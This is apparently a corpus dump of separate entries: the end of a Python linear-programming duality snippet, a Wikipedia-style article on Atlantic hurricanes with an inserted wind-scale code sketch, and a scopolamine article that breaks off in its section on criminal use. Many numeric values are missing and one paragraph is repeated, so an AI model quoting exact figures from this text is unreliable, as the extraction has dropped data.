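# Primal: maximize 3*x1 + 5*x2 subject to x1 <= 4, 2*x2 <= 12,
# 3*x1 + 2*x2 <= 18, x >= 0 (a classic textbook LP).
c = np.array([3.0, 5.0])
A = np.array([[1.0, 0.0], [0.0, 2.0], [3.0, 2.0]])
b = np.array([4.0, 12.0, 18.0])

# linprog minimizes, so negate c to maximize the primal.
primal = linprog(-c, A_ub=A, b_ub=b, bounds=[(0, None)] * 2)

# Dual: minimize b @ y subject to A.T @ y >= c, y >= 0
# (rewritten as -A.T @ y <= -c for linprog's <= convention).
dual = linprog(b, A_ub=-A.T, b_ub=-c, bounds=[(0, None)] * 3)

print(-primal.fun, dual.fun)  # both 36.0 — zero duality gap
```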
Mathematics
Optimization
null
3373620
https://en.wikipedia.org/wiki/Atlantic%20hurricane
Atlantic hurricane
An Atlantic hurricane is a type of tropical cyclone that forms in the Atlantic Ocean primarily between June and November. The terms "hurricane", "typhoon", and "tropical cyclone" all describe the same weather phenomenon; which term is used depends on the region. These storms continuously rotate around a low pressure center, causing stormy weather across a large area that is not limited to the eye of the storm. They are organized systems of clouds and thunderstorms that originate over tropical or subtropical waters around areas of low pressure and have a closed low-level circulation; they should not be confused with tornadoes, which are another type of cyclone. In the North Atlantic and the Eastern Pacific, the term "hurricane" is used, whereas "typhoon" is used in the Western Pacific near Asia. The more general term "cyclone" is used in the rest of the ocean basins, namely the South Pacific and Indian Ocean. Tropical cyclones can be categorized by intensity. Tropical storms have one-minute maximum sustained winds of at least 39 mph (34 knots, 17 m/s, 63 km/h), while hurricanes have one-minute maximum sustained winds of 74 mph or more (64 knots, 33 m/s, 119 km/h). Most North Atlantic tropical cyclones form between August 1 and November 30, when most tropical disturbances occur. The United States National Hurricane Center (NHC) monitors tropical weather systems for the North Atlantic Basin and issues reports, watches, and warnings. It is considered to be one of the Regional Specialized Meteorological Centers for tropical cyclones, as defined by the World Meteorological Organization. Until the mid-1900s, storms were named arbitrarily. The practice of naming storms from a predetermined list began in 1953, when storms were exclusively given feminine names; this continued until 1979, when storms began being given both male and female names. Since storm names may be used repeatedly, hurricanes that result in significant damage or casualties may have their names retired from the list at the request of the affected nations to prevent confusion. On average, 14 named storms occur each season in the North Atlantic basin, with 7 becoming hurricanes and 3 becoming major hurricanes (Category 3 or greater). The climatological peak of activity is typically around mid-September. In March 2004, Catarina became the first storm of hurricane strength to be recorded in the South Atlantic Ocean. Since 2011, the Brazilian Navy Hydrographic Center has used the same scale as the North Atlantic Ocean for tropical cyclones in the South Atlantic Ocean and assigns names to those that reach . Steering factors Tropical cyclones are steered by flows surrounding them throughout the depth of the troposphere (the atmospheric layer ranging from the ground to about high). Neil Frank, former director of the United States National Hurricane Center, used analogies such as "a leaf carried along in a stream" or a "brick moving through a river of air" to describe the way atmospheric flow affects the path of a hurricane across the ocean. Specifically, air flow around high pressure systems and toward low-pressure areas influences hurricane tracks. In the tropical latitudes, tropical storms and hurricanes generally move westward with a slight tendency toward the north due to being under the influence of the subtropical ridge, a high-pressure system that usually extends east–west across the subtropics. South of the subtropical ridge, surface easterly winds (blowing from east to west) prevail. 
If the subtropical ridge is weakened by an upper trough, a tropical cyclone may turn poleward (north) and then recurve (curve back toward the northeast into the main belt of the westerlies). Poleward of the subtropical ridge, westerly winds prevail and generally move tropical cyclones that reach northern latitudes toward the east. The westerlies also move extratropical cyclones and their cold and warm fronts from west to east. Intensity The intensity of a tropical cyclone is generally determined by either a storm's maximum sustained winds or its lowest barometric pressure. The following table lists the most intense Atlantic hurricanes in terms of their lowest barometric pressure. In terms of wind speed, Hurricane Allen (in 1980) was the strongest Atlantic tropical cyclone on record, with maximum sustained winds of . However, these measurements are suspect, since instrumentation used to document wind speeds at the time was likely to succumb to winds of such intensity. Nonetheless, the central pressures of the strongest storms are low enough to rank them among the strongest recorded Atlantic hurricanes. Owing to their intensity, the strongest Atlantic hurricanes have all attained Category 5 classification. Hurricane Opal, the strongest Category 4 hurricane recorded, intensified to reach a minimum pressure of , a pressure typical of Category 5 hurricanes. Hurricane Wilma became the strongest Atlantic hurricane recorded after reaching an intensity of in October 2005; this also made Wilma the strongest tropical cyclone worldwide outside of the Pacific, where seven tropical cyclones have been recorded to intensify to lower pressures; one of these was Hurricane Patricia in 2015 in the east Pacific, which had a pressure reading of 872 mbar. Preceding Wilma is Hurricane Gilbert, which held the record for the most intense Atlantic hurricane for 17 years. The 1935 Labor Day hurricane, with a pressure of 892 mbar (hPa; ), is the third strongest Atlantic hurricane and the strongest documented tropical cyclone before 1950. Since the measurements taken during Wilma and Gilbert were documented by dropsonde, the Labor Day hurricane's pressure remains the lowest measured over land. Hurricane Rita is the fourth strongest Atlantic hurricane in terms of barometric pressure and one of three tropical cyclones from 2005 on the list, with the others being Wilma and Katrina at first and seventh respectively. However, with a barometric pressure of , Rita is the strongest tropical cyclone ever recorded in the Gulf of Mexico. Hurricanes Mitch and Dean share the rank of ninth strongest Atlantic hurricane at . Tenth place for the most intense Atlantic tropical cyclone belongs to Hurricane Maria, which is listed to have deepened to a pressure as low as . Many of the strongest recorded tropical cyclones weakened before their eventual landfall or demise. However, three of the ten hurricanes on the list remained intense enough at landfall to constitute the three most intense Atlantic landfalls in recorded history. The 1935 Labor Day hurricane made landfall at peak intensity, making it the most intense Atlantic landfall. Though it weakened slightly before its eventual landfall on the Yucatán Peninsula, Hurricane Gilbert maintained a pressure of 900 hPa at landfall, as did Camille, making their landfalls tied as the second strongest. 
Hurricane Dean also made landfall on the peninsula, but it did so at peak intensity and with a higher barometric pressure; its landfall marked the fourth strongest in Atlantic hurricane history. Climatology Climatology serves to characterize the general properties of an average season and can be used for making forecasts. Most storms form from tropical waves in warm waters several hundred miles north of the equator near the Intertropical Convergence Zone. The Coriolis force is usually too weak to initiate sufficient rotation near the equator. Storms frequently form in the waters of the Gulf of Mexico, the Caribbean, the tropical Atlantic Ocean, and in areas as far east as the Cape Verde Islands, creating Cape Verde-type hurricanes. Systems may also strengthen over the Gulf Stream off the coast of the eastern United States wherever water temperatures exceed . Although most storms are found within tropical latitudes, occasionally storms will form further north and east due to disturbances other than tropical waves, such as cold fronts and upper-level lows. These are known as baroclinically induced tropical cyclones. There is a strong correlation between the amount of Atlantic hurricane activity in the tropics and the presence of an El Niño or La Niña in the Pacific Ocean. El Niño events increase the wind shear over the Atlantic, producing a less favorable environment for formation and decreasing tropical activity in the Atlantic basin. Conversely, La Niña causes an increase in activity due to a decrease in wind shear. According to the Azores High hypothesis by Kam-biu Liu, an anti-phase pattern is expected to exist between the Gulf of Mexico coast and the North American Atlantic coast. During the quiescent periods (3000–1400 BC, and 1000 AD to present), a more northeasterly position of the Azores High would result in more hurricanes being steered toward the Atlantic coast. During the hyperactive period (1400 BC to 1000 AD), more hurricanes were steered towards the Gulf coast as the Azores High was shifted to a more southwesterly position near the Caribbean. Such a displacement of the Azores High is consistent with paleoclimatic evidence that shows an abrupt onset of a drier climate in Haiti around 3200 14C years BP, and a change towards more humid conditions in the Great Plains during the late-Holocene as more moisture was pumped up the Mississippi Valley through the Gulf coast. Preliminary data from the northern Atlantic coast seem to support the Azores High hypothesis. A 3000-year proxy record from a coastal lake in Cape Cod suggests that hurricane activity has increased significantly during the past 500–1000 years, just as the Gulf coast was amid a quiescent period of the last millennium. Seasonal variation Approximately 97 percent of tropical cyclones that form in the North Atlantic develop between June 1 and November 30, which delimit the modern-day Atlantic hurricane season. Though the beginning of the annual hurricane season has historically remained the same, the official end of the hurricane season has shifted from its initial date of October 31. Regardless, on an average of every few years, a tropical cyclone develops outside the limits of the season. As of September 2021, there have been 88 tropical cyclones in the off-season, with the most recent being Tropical Storm Ana in May 2021. 
The first tropical cyclone of the 1938 Atlantic hurricane season, which formed on January 3, became the earliest-forming tropical storm on record, a conclusion reached by post-storm reanalysis in December 2012. Hurricane Able in 1951 was initially thought to be the earliest-forming major hurricane – a tropical cyclone with winds exceeding  – however, following post-storm analysis, it was determined that Able only reached Category 1 strength, which made Hurricane Alma of 1966 the new record holder, as it became a major hurricane on June 8. Though it developed within the bounds of the Atlantic hurricane season, Hurricane Audrey in 1957 became the earliest-developing Category 4 hurricane on record after it attained that intensity on June 27. However, NOAA reanalysis of the 1956–1960 seasons downgraded Audrey to a Category 3, making Hurricane Dennis of 2005 the earliest Category 4 on record, on July 8, 2005. The earliest-forming Category 5 hurricane, Beryl, reached the highest intensity on the Saffir–Simpson hurricane wind scale on July 2, 2024. Though the official end of the Atlantic hurricane season occurs on November 30, the dates of October 31 and November 15 have also historically marked the end date for the hurricane season. December, the only month of the year after the hurricane season, has featured the cyclogenesis of fourteen tropical cyclones. Tropical Storm Zeta in 2005 was the latest tropical cyclone to attain tropical storm intensity, as it did so on December 30. However, the second Hurricane Alice in 1954 was the latest-forming tropical cyclone to attain hurricane intensity. Zeta and Alice are the only two storms to have existed in two calendar years – the former from 2005 to 2006 and the latter from 1954 to 1955. No storms have been recorded to exceed Category 1 hurricane intensity in December. In 1999, Hurricane Lenny reached Category 4 intensity on November 17 as it took an unprecedented west-to-east track across the Caribbean; its intensity made it the latest-developing Category 4 hurricane, though this was well within the bounds of the hurricane season. Hurricane Hattie (October 27 – November 1, 1961) was initially thought to have been the latest-forming Category 5 hurricane ever documented, as was 2020's Hurricane Iota, but both were later downgraded during subsequent reanalysis. Reanalysis also indicated that a hurricane in 1932 reached Category 5 intensity later than any other hurricane on record in the Atlantic. June The beginning of the hurricane season is most closely related to the timing of increases in sea surface temperatures, convective instability, and other thermodynamic factors. Although June marks the beginning of the hurricane season, little activity usually occurs, with an average of one tropical cyclone every two years. During this early period in the hurricane season, tropical systems usually form in the Gulf of Mexico or off the east coast of the United States. Since 1851, a total of 81 tropical storms and hurricanes have formed in June. During this period, two of these systems developed in the deep tropics east of the Lesser Antilles. Since 1870, three major hurricanes have formed during June, including Hurricane Audrey in 1957. Audrey attained an intensity greater than that of any Atlantic tropical cyclone during June or July until Hurricanes Dennis and Emily of 2005. The easternmost-forming June storm, Tropical Storm Bret in 2023, formed at 40.3°W. July Little tropical activity occurs during July, with only one tropical cyclone usually forming. 
From 1944 to 1996, the first tropical storm occurred by July 11 in half of the seasons, and a second formed by August 8. Formation usually occurs in the eastern Caribbean around the Lesser Antilles, in the northern and eastern parts of the Gulf of Mexico, in the vicinity of the northern Bahamas, and off the coast of the Carolinas and Virginia over the Gulf Stream. Storms travel westward through the Caribbean and then either move towards the north and curve near the eastern coast of the United States or stay on a north-westward track and enter the Gulf of Mexico. Since 1851, a total of 105 tropical storms have formed during July. Since 1870, ten of these storms reached major hurricane intensity; of these, only Hurricane Emily of 2005 and Hurricane Beryl of 2024 attained Category 5 hurricane status. The easternmost-forming and longest-lived July storm, Hurricane Bertha in 2008, formed at 22.9°W and lasted 17 days. August A decrease in wind shear from July to August contributes to an increase in tropical activity. An average of 2.8 Atlantic tropical storms develop annually in August. On average, four named tropical storms, including one hurricane, occur by August 30, and the first intense hurricane develops by September 4. September The peak of the hurricane season occurs in September and corresponds with low wind shear and the warmest sea surface temperatures. The month of September sees an average of 3 storms a year. By September 24, the average Atlantic season features 7 named tropical storms, including 4 hurricanes. In addition, two major hurricanes occur on average by September 28. Relatively few tropical cyclones make landfall at these intensities. October The favorable conditions found during September begin to decay in October. The main reason for the decrease in activity is increasing wind shear, although sea surface temperatures are also cooler than in September. In October, only 1.8 cyclones develop on average, despite a climatological secondary peak around October 20. By October 21, the average season features 9 named storms with 5 hurricanes. A third major hurricane occurs after September 28 in half of all Atlantic tropical cyclone seasons. In contrast to mid-season activity, the mean locus of formation shifts westward to the Caribbean and Gulf of Mexico, reversing the eastward progression of June through August. November Wind shear from the westerlies increases throughout November, generally preventing cyclone formation. On average, one tropical storm forms during every other November. On rare occasions, a major hurricane occurs. The few intense hurricanes in November include the Cuba hurricane in late October and early November 1932 (the strongest November hurricane on record, peaking as a Category 5 hurricane), Hurricane Lenny in mid-November 1999, and Hurricane Kate in late November 1985, which was the latest major hurricane formation on record until Hurricane Otto (a Category 3 storm) in the 2016 hurricane season. Hurricane Paloma was a Category 4 storm that made landfall in Cuba in early November 2008. Hurricane Eta strengthened into a Category 4 hurricane in early November 2020, becoming the third most intense tropical cyclone in November, and made landfall in Central America. In that same year, Hurricane Iota strengthened into a Category 4 hurricane on November 16, becoming the second most intense hurricane in November. 
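Since the monthly climatology above repeatedly refers to Saffir–Simpson categories and major-hurricane status, a small classifier sketch may help; the wind thresholds below are the commonly published NHC values and are an assumption of this sketch, not taken from the text.

```python
def saffir_simpson(wind_mph: float) -> str:
    """Classify a one-minute sustained wind speed (mph) on the
    Saffir-Simpson hurricane wind scale; 'major hurricane' means
    Category 3 or greater."""
    if wind_mph >= 157:
        return "Category 5"
    elif wind_mph >= 130:
        return "Category 4"
    elif wind_mph >= 111:
        return "Category 3"
    elif wind_mph >= 96:
        return "Category 2"
    elif wind_mph >= 74:
        return "Category 1"
    elif wind_mph >= 39:
        return "tropical storm"
    return "tropical depression"

print(saffir_simpson(120))  # Category 3 — i.e., a major hurricane
```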
December to May Although the hurricane season is defined as beginning on June 1 and ending on November 30, tropical cyclones have formed in every month of the year. Since 1870, there have been 32 off-season cyclones, 18 of which occurred in May. In the same period, nine storms formed in December, three in April, and one each in January, February, and March. During four years (1887, 1953, 2003, and 2007), tropical cyclones formed in the North Atlantic Ocean both during or before May and during December. 1887 holds the record for the most storms outside the hurricane season, with four off-season storms. However, high vertical wind shear and low sea surface temperatures generally preclude tropical cyclone formation during the off-season. Among the tropical cyclones that formed in December, the lifespans of two continued into January of the following calendar year: Hurricane Alice in 1954–55, and Tropical Storm Zeta in 2005–06. Seven tropical or subtropical cyclones formed in January, two of which became Category 1 hurricanes: the first storm of 1938, and Hurricane Alex in 2016. No major hurricanes have occurred in the off-season. Extremes The season in which the most tropical storms formed on record is the 2020 Atlantic hurricane season, which produced 30 storms. However, the 2005 season holds the record for the most hurricanes (15). The 2005 Atlantic hurricane season also had the most major hurricanes on record (7), a record tied by 2020. The 1950 Atlantic hurricane season and 1961 Atlantic hurricane season were once thought to have 8 and 7 respectively, but re-analysis showed that several storms during both seasons were weaker than thought, and thus the records are now held by the 2005 and 2020 seasons. Notable storms in 2005 included Hurricane Katrina and Hurricane Wilma. The least active season on record since 1946 (when the database is considered more reliable) was the 1983 Atlantic hurricane season, with four tropical storms, two hurricanes, and one major hurricane. Overall, the 1914 Atlantic hurricane season remains the least active, with only one documented storm. The most intense hurricane (by barometric pressure) on record in the North Atlantic basin was Hurricane Wilma (2005) (882 mbar). The largest hurricane (in gale diameter winds) on record to form in the North Atlantic was Hurricane Sandy (2012), with a gale diameter of . The longest-lasting hurricane was the 1899 San Ciriaco hurricane, which lasted for 27 days and 18 hours as a tropical cyclone. The most tornadoes spawned by a hurricane were the 127 created by Hurricane Ivan (2004 season). The strongest hurricane to reach land was the Labor Day Hurricane of 1935 (892 hPa). The deadliest hurricane was the Great Hurricane of 1780 (22,000 fatalities). The deadliest hurricane to make landfall on the continental United States was the Galveston Hurricane in 1900, which may have killed up to 12,000 people. The most damaging hurricanes were Hurricane Katrina and Hurricane Harvey of the 2005 and 2017 seasons, respectively; both caused $125 billion in damages in their respective years. However, when adjusted for inflation, Katrina is the costliest, with $161 billion in damages. The quickest-forming hurricane was Hurricane Humberto in 2007. It was a small hurricane that formed and intensified faster than any other tropical cyclone on record before landfall. 
Developing on September 12, 2007, in the northwestern Gulf of Mexico, the cyclone strengthened and struck High Island, Texas, with winds of about early on September 13. Trends Paleoclimatology and historical trends Proxy records based on paleotempestological research have revealed that major hurricane activity along the Gulf Coast varies on timescales of centuries to millennia. A few major hurricanes struck the Gulf Coast during 3000–1400 BC and during the most recent millennium. These quiescent intervals were separated by a hyperactive period between 1400 BC and 1000 AD, when the Gulf coast was struck frequently by hurricanes; their landfall probabilities increased by 3–5 times. This millennial-scale variability has been attributed to long-term shifts in the position of the Azores High, which may also be linked to changes in the strength of the North Atlantic Oscillation. According to the Azores High hypothesis, an anti-phase pattern is expected to exist between the Gulf Coast and the Atlantic coast. During the quiescent periods, a more northeasterly position of the Azores High would result in more hurricanes being steered towards the Atlantic coast. During the hyperactive period, more hurricanes were steered towards the Gulf coast, as the Azores High was shifted to a more southwesterly position near the Caribbean. Such a displacement of the Azores High is consistent with paleoclimatic evidence that shows an abrupt onset of a drier climate in Haiti around 3200 14C years BP, and a change towards more humid conditions in the Great Plains during the late-Holocene as more moisture was pumped up the Mississippi Valley through the Gulf coast. Preliminary data from the northern Atlantic coast seem to support the Azores High hypothesis. A 3,000-year proxy record from a coastal lake in Cape Cod suggests that hurricane activity increased significantly during the past 500–1000 years, just as the Gulf Coast was amid a quiescent period during the last millennium. Evidence also shows that the average latitude of hurricane impacts has been steadily shifting northward towards the Eastern Seaboard over the past few centuries. This shift has accelerated in modern times as the Arctic has warmed, largely as a result of fossil fuel-driven climate change. The number and strength of Atlantic hurricanes may undergo a 50–70 year cycle known as the Atlantic Multidecadal Oscillation. Nyberg et al. reconstructed Atlantic major hurricane activity back to the early eighteenth century and found five periods averaging 3–5 major hurricanes per year and lasting 40–60 years, and six others averaging 1.5–2.5 major hurricanes per year and lasting 10–20 years. These periods are associated with the Atlantic multidecadal oscillation. Throughout the periods, a decadal oscillation related to solar irradiance was responsible for enhancing or dampening the number of major hurricanes by 1–2 per year. Climate change Between 1979 and 2019, the intensity of tropical cyclones increased; globally, tropical cyclones became about 8% more likely per decade to reach major intensities (Saffir–Simpson Categories 3 to 5). This trend is particularly strong in the North Atlantic, where the probability of cyclones reaching Category 3 or higher increased by 49% per decade. This is consistent with the theoretical understanding of the link between climate change and tropical cyclones, and with model studies. While the number of storms in the Atlantic has increased since 1995, there is no obvious global trend. 
The annual number of tropical cyclones worldwide remains about 87 ± 10. However, the ability of climatologists to make long-term data analyses in certain basins is limited by the lack of reliable historical data in some basins, primarily in the Southern Hemisphere. A poleward migration has been observed in the paths of maximum intensity of tropical cyclone activity in the Atlantic, as shown by research on the latitudes at which recent tropical cyclones in the Atlantic are reaching maximum intensity. The data indicate that during the past thirty years, the peak intensity of these storms has shifted poleward in both hemispheres at a rate of approximately 60 km per decade, amounting to roughly half a degree of latitude per decade. Impact Atlantic storms are becoming more financially destructive, since five of the ten most expensive storms in United States history have occurred since 1990. According to the World Meteorological Organization, a "recent increase in societal impact from tropical cyclones has largely been caused by rising concentrations of population and infrastructure in coastal regions." Pielke et al. (2008) normalized mainland U.S. hurricane damage from 1900–2005 to 2005 values and found no remaining trend of increasing absolute damage. The 1970s and 1980s had low amounts of damage compared to other decades. The decade 1996–2005 has the second most damage among the past 11 decades, with only the decade of 1926–1935 surpassing its costs. The most damaging single storm is the 1926 Miami hurricane, with $157 billion of normalized damage. Partially because of the threat of hurricanes, some coastal regions had sparse populations between major ports until the advent of automobile tourism; therefore, the most severe portions of hurricanes striking the coast may have gone unmeasured in some instances. The combined effects of ship destruction and remote landfall limit the number of intense hurricanes in the official record before the era of hurricane reconnaissance aircraft and satellite meteorology. However, the record shows a distinct increase in the number and strength of intense hurricanes; therefore, experts regard the early data as suspect. Christopher Landsea et al. estimated an undercount bias of zero to six tropical cyclones per year between 1851 and 1885 and zero to four per year between 1886 and 1910. These undercounts roughly take into account the typical size of tropical cyclones, the density of shipping tracks over the Atlantic basin, and the amount of populated coastline. Few above-normal hurricane seasons occurred from 1970 to 1994, whereas above-normal seasons have been common since 1995. Destructive hurricanes struck frequently from 1926 to 1960, especially in New England. In 1933, twenty-one Atlantic tropical storms formed; the only years with more were 2005 and 2020, which saw 28 and 30 storms, respectively. Hurricanes occurred infrequently during the seasons of 1900–25; however, many intense storms formed during 1870–99. During the 1887 season, 19 tropical storms formed, of which a record 4 occurred after November 1; 11 of the storms strengthened into hurricanes. Few hurricanes occurred from the 1840s to 1860s; however, many struck in the early 19th century, including an 1821 storm that made landfall over New York City. Some historical weather experts say these storms may have been as high as Category 4 in strength. These active hurricane seasons predated satellite coverage of the Atlantic basin. 
Before the satellite era began in 1960, tropical storms or hurricanes went undetected, unless a reconnaissance aircraft encountered one, a ship reported a voyage through the storm, or a storm landed in a populated area. The official record, therefore, may lack mentions of storms in which no ship experienced gale-force winds, recognized it as a tropical storm (as opposed to a high-latitude extra-tropical cyclone, a tropical wave, or a brief squall), returned to port, and reported the experience.
Physical sciences
Storms
Earth science
28979
https://en.wikipedia.org/wiki/Scopolamine
Scopolamine
Scopolamine, also known as hyoscine, or Devil's Breath, is a natural or synthetically produced tropane alkaloid and anticholinergic drug that is used as a medication to treat motion sickness and postoperative nausea and vomiting. It is also sometimes used before surgery to decrease saliva. When used by injection, effects begin after about 20 minutes and last for up to 8 hours. It may also be used orally and as a transdermal patch, since it has long been known to have transdermal bioavailability. Scopolamine is in the antimuscarinic family of drugs and works by blocking some of the effects of acetylcholine within the nervous system. Scopolamine was first written about in 1881 and started to be used for anesthesia around 1900. Scopolamine is also the main active component produced by certain plants of the nightshade family, which historically have been used as psychoactive drugs, known as deliriants, due to their antimuscarinic-induced hallucinogenic effects in higher doses. In these contexts, its mind-altering effects have been utilized for recreational and occult purposes. The name "scopolamine" is derived from one type of nightshade known as Scopolia, while the name "hyoscine" is derived from another type known as Hyoscyamus niger, or black henbane. It is on the World Health Organization's List of Essential Medicines. Medical uses Scopolamine has a number of formal uses in modern medicine, where it is used in its isolated form and in low doses to treat postoperative nausea and vomiting; motion sickness, including sea sickness, leading to its use by scuba divers (where it is often applied as a transdermal patch behind the ear); gastrointestinal spasms; renal or biliary spasms; irritable bowel syndrome; clozapine-induced drooling; bowel colic; and eye inflammation, and as an aid in gastrointestinal radiology and endoscopy. It is sometimes used as a premedication, especially to reduce respiratory tract secretions in surgery, most commonly by injection. Common side effects include sleepiness, blurred vision, dilated pupils, and dry mouth. It is not recommended in people with angle-closure glaucoma or bowel obstruction. Whether its use during pregnancy is safe remains unclear, and use during breastfeeding is still cautioned against by health professionals and manufacturers of the drug. Breastfeeding Scopolamine enters breast milk by secretion. Although no human studies exist to document the safety of scopolamine while nursing, the manufacturer recommends that caution be taken if scopolamine is administered to a breastfeeding woman. Adverse effects Uncommon (0.1–1% incidence) adverse effects include dry mouth, anhidrosis (reduced ability to sweat to cool off), tachycardia (usually occurring at higher doses and succeeded by bradycardia), bradycardia, urticaria (hives), and pruritus (itching). Rare (<0.1% incidence) adverse effects include constipation, urinary retention, hallucinations, agitation, confusion, restlessness, and seizures. Adverse effects of unknown frequency include anaphylactic shock or reactions, dyspnea (shortness of breath), rash, erythema, other hypersensitivity reactions, blurred vision, mydriasis (dilated pupils), drowsiness, dizziness, and somnolence. Overdose Physostigmine, a cholinergic drug that readily crosses the blood–brain barrier, has been used as an antidote to treat the central nervous system depression symptoms of a scopolamine overdose. Other than this supportive treatment, gastric lavage and induced emesis (vomiting) are usually recommended as treatments for oral overdoses. 
The symptoms of overdose include tachycardia, arrhythmia, blurred vision, photophobia, urinary retention, drowsiness or paradoxical reaction (which can present with hallucinations), Cheyne–Stokes respiration, dry mouth, skin reddening, and inhibition of gastrointestinal motility. Route of administration Scopolamine can be taken by mouth, subcutaneously, in the eye, and intravenously, as well as via a transdermal patch. Pharmacology Pharmacodynamics The pharmacological effects of scopolamine are mediated through the drug's competitive antagonism of the peripheral and central muscarinic acetylcholine receptors. Scopolamine acts as a nonspecific muscarinic antagonist at all four (M1, M2, M3, and M4) receptor sites. In doses higher than intended for medicinal use, the hallucinogenic alteration of consciousness, and the delirium in particular, are tied to the compound's activity at the M1 muscarinic receptor. M1 receptors are located primarily in the central nervous system and are involved in perception, attention, and cognitive functioning. Delirium is associated only with the antagonism of postsynaptic M1 receptors; currently, no other receptor subtypes have been implicated. Peripheral muscarinic receptors are part of the autonomic nervous system. M2 receptors are located in the brain and heart, M3 receptors are in salivary glands, and M4 receptors are in the brain and lungs. Due to the drug's inhibition of various signal transduction pathways, the decrease in acetylcholine signaling is what leads to many of the cognitive deficits, mental impairments, and delirium associated with psychoactive doses. Medicinal effects appear to be tied mostly to action at the peripheral receptors and only to marginal decreases in acetylcholine signaling. Although often broadly referred to as simply being 'anticholinergic', antimuscarinic would be more specific and accurate terminology for scopolamine, as, for example, it is not known to block nicotinic receptors. Pharmacokinetics Scopolamine undergoes first-pass metabolism and about 2.6% is excreted unchanged in urine. It has a bioavailability of 20–40%, reaches peak plasma concentration in about 45 minutes, and in healthy subjects has an average half-life of 5 hours (observed range 2–10 hours). Scopolamine is primarily metabolized by the CYP3A4 enzyme, and grapefruit juice decreases the metabolism of scopolamine, consequently increasing its plasma concentration. Chemistry Biosynthesis in plants Scopolamine is among the secondary metabolites of plants from the Solanaceae (nightshade) family, such as henbane (Hyoscyamus niger), jimson weed (Datura), angel's trumpets (Brugmansia), deadly nightshade (Belladonna), mandrake (Mandragora officinarum), and corkwood (Duboisia). The biosynthesis of scopolamine begins with the decarboxylation of L-ornithine to putrescine by ornithine decarboxylase. Putrescine is methylated to N-methylputrescine by putrescine N-methyltransferase. A putrescine oxidase that specifically recognizes methylated putrescine catalyzes the deamination of this compound to 4-methylaminobutanal, which then undergoes a spontaneous ring formation to the N-methyl-pyrrolium cation. In the next step, the pyrrolium cation condenses with acetoacetic acid, yielding hygrine. No enzymatic activity could be demonstrated to catalyze this reaction. Hygrine further rearranges to tropinone. Subsequently, tropinone reductase I converts tropinone to tropine, which condenses with phenylalanine-derived phenyllactate to littorine. 
A cytochrome P450 classified as Cyp80F1 oxidizes and rearranges littorine to hyoscyamine aldehyde. In the final step, hyoscyamine undergoes epoxidation catalyzed by 6beta-hydroxyhyoscyamine epoxidase, yielding scopolamine. History Plants naturally containing scopolamine, such as Atropa belladonna (deadly nightshade), Brugmansia (angel's trumpet), Datura (Jimson weed), Hyoscyamus niger, Mandragora officinarum, Scopolia carniolica, Latua and Duboisia myoporoides, have been known about and used for various purposes in both the New and Old Worlds since ancient times. Being one of the earlier alkaloids isolated from plant sources, scopolamine has been in use in its purified forms, such as various salts, including hydrochloride, hydrobromide, hydroiodide, and sulfate, since its official isolation by the German scientist Albert Ladenburg in 1880, and as various preparations from its plant-based form since antiquity and perhaps prehistoric times. In 1899, Dr. Schneiderlin recommended the use of scopolamine and morphine for surgical anaesthesia, and it started to be used sporadically for that purpose. The use of this combination in obstetric anesthesiology (childbirth) was first proposed by Richard von Steinbuchel in 1902 and was picked up and further developed by Carl Gauss in Freiburg, Germany, starting in 1903. The method, which was based on a drug synergy between scopolamine and morphine, came to be known as Dämmerschlaf ("twilight sleep") or the "Freiburg method". It spread rather slowly, and different clinics experimented with different dosages and ingredients. In 1915, the Canadian Medical Association Journal reported, "the method [was] really still in a state of development". It remained widely used in the US until the 1960s, when growing chemophobia and a desire for more natural childbirth led to its abandonment. Society and culture Names Hyoscine hydrobromide is the international nonproprietary name, and scopolamine hydrobromide is the United States Adopted Name. Other names include levo-duboisine, devil's breath, and burundanga. Australian bush medicine A bush medicine developed by Aboriginal peoples of the eastern states of Australia from the soft corkwood tree (Duboisia myoporoides) was used by the Allies in World War II to stop soldiers from getting seasick when they sailed across the English Channel on their way to France during the Invasion of Normandy. Later, the same substance was found to be usable in the production of scopolamine and hyoscyamine, which are used in eye surgery, and a multimillion-dollar industry was built in Queensland based on this substance. Recreational and religious use While it has been occasionally used recreationally for its hallucinogenic properties, the experiences are often unpleasant, mentally and physically. It is also physically dangerous and officially classified as a deliriant drug, so repeated recreational use is rare. In June 2008, more than 20 people were hospitalized with psychosis in Norway after ingesting counterfeit Rohypnol tablets containing scopolamine. In January 2018, 9 individuals were hospitalized in Perth, Western Australia, after reportedly ingesting scopolamine. The alkaloid scopolamine, when taken recreationally for its psychoactive effect, is usually taken in the form of preparations from plants of the genera Datura or Brugmansia, often by adolescents or young adults in order to achieve hallucinations and an altered state of consciousness induced by muscarinic antagonism. 
In circumstances such as these, the intoxication results from a synergistic, and even more toxic, mixture of alkaloids, since these plants also contain atropine and hyoscyamine. Historically, the various plants that produce scopolamine have been used psychoactively for spiritual and magical purposes, particularly by witches in Western culture and indigenous groups throughout the Americas, such as the Chumash. When entheogenic preparations of these plants were used, scopolamine was considered to be the main psychoactive compound and was largely responsible for the hallucinogenic effects, particularly when the preparation was made into a topical ointment, most notably flying ointment. Scopolamine is reported to be the only active alkaloid within these plants that can effectively be absorbed through the skin to cause effects. Different recipes for these ointments were explored in European witchcraft at least as far back as the Early Modern period and included multiple ingredients to help with the transdermal absorption of scopolamine, such as animal fat, as well as other possible ingredients to counteract its noxious and dysphoric effects. The Bible mentions mandrake, a psychoactive and hallucinogenic plant root that contains scopolamine, several times. It was associated with fertility and sexual desire, and was sought for that reason by Rachel, who was "barren" (infertile) but trying to conceive. Interrogation The effects of scopolamine were studied for use as a truth serum in interrogations in the early 20th century, but because of the side effects, investigations were dropped. In 2009, the Czechoslovak state security secret police were proven to have used scopolamine at least three times to obtain confessions from alleged anti-state dissidents. Use in crime Ingestion of scopolamine can render a victim unconscious for 24 hours or more. In large doses, it can cause respiratory failure and death. Criminal use appears to be most commonly recorded in Colombia, where unofficial estimates put the number of scopolamine incidents at approximately 50,000 per year. A travel advisory published by the U.S. Overseas Security Advisory Council (OSAC) in 2012 stated: Between 1998 and 2004, 13% of emergency-room admissions for "poisoning with criminal intentions" in a Bogotá clinic were attributed to scopolamine, and 44% to benzodiazepines. Most commonly, the person has been poisoned by a robber who gave the victim a scopolamine-laced beverage, in the hope that the victim would become unconscious or unable to effectively resist the robbery. Besides robberies, it is also allegedly involved in express kidnappings and sexual assault. In 2008, the Hospital Clínic in Barcelona introduced a protocol to help medical workers identify cases. In February 2015, Madrid hospitals adopted a similar working document. Hospital Clínic has found little scientific evidence to support this use and relies on the victims' stories to reach any conclusion. Although poisoning by scopolamine appears quite often in the media as an aid for raping, kidnapping, killing, or robbery, the effects of this drug and the way it is applied by criminals 